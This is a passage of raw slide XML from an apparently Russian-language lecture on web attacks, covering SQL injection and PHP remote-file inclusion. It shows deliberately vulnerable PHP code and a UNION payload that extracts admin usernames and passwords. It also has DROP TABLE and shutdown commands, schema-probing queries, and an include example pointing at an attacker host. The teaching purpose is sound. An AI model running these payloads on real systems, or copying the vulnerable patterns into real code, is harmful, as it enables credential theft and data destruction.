              <a:t>SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>кода</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3900"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357120" y="1500120"/>
            <a:ext cx="8327520" cy="4998600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Пример – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>php-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>скрипт отображения новостей:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2800"/>
            </a:br>
            <a:br>
              <a:rPr sz="2800"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> http://site.ru/showNews.php?id=5 </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2800"/>
            </a:br>
            <a:br>
              <a:rPr sz="2800"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> $res = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> id_news, header, body, author </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> news </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> id_news = " . </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>$_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>['id']);</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2800"/>
            </a:br>
            <a:br>
              <a:rPr sz="2800"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Внедряем в запрос </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>код:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2800"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://site.ru/showNews.php?id=-1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>username,password</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%20 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Text Box 3"/>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6D97D95E-28B0-49ED-B24C-B266658A9C23}"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6"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Внедрение </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>кода</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3900"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="Text Box 2"/>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68BD03AA-5344-43E4-81B8-833633F2DF56}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="398" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="725400" y="1454040"/>
            <a:ext cx="7916400" cy="504468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2"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Виды нарушителей и цели их действия</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Text Box 2"/>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4469F0BC-0897-45EA-8961-26016DFFA5A8}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="284" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1571760"/>
            <a:ext cx="9141840" cy="4712760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="285" name="Object 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7589880" y="0"/>
          <a:ext cx="1551960" cy="1902960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj r:id="rId2" spid="">
              <p:embed/>
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="286" name="Object 4" descr=""/>
                  <p:cNvPicPr/>
                  <p:nvPr/>
                </p:nvPicPr>
                <p:blipFill>
                  <a:blip r:embed="rId3"/>
                  <a:stretch/>
                </p:blipFill>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="7589880" y="0"/>
                    <a:ext cx="1551960" cy="1902960"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                </p:spPr>
              </p:pic>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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9"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Внедрение </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>кода</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3900"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1428840"/>
            <a:ext cx="9141840" cy="5212800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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arn-CL" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DROP TABLE `users`</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="arn-CL" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> CREATE TABLE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> …</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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arn-CL" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>shutdown with nowait;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE name='Admin' AND password LIKE '%m%‘</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Определение имени БД:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2800"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%t%')</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Определение имен таблиц:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2800"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE‘</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2800"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="arn-CL" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>select * from sys.tables</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Text Box 3"/>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AB9AA49A-C69F-4D2F-BDF5-3C8AF8960D13}"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2"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Внедрение </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>-кода</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3900"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>PHP- injection</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214200" y="1500120"/>
            <a:ext cx="8470440" cy="4628520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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Пример:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>php-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>скрипт </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  http://site.php?module=...</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> содержит</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>строки:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>$module = $_GET['module'];</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>include ($module.'.php');</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Хакер создает свой </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>php-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>код </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>hack.php, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>выкладывает его на сервер </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>hacker.ru </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
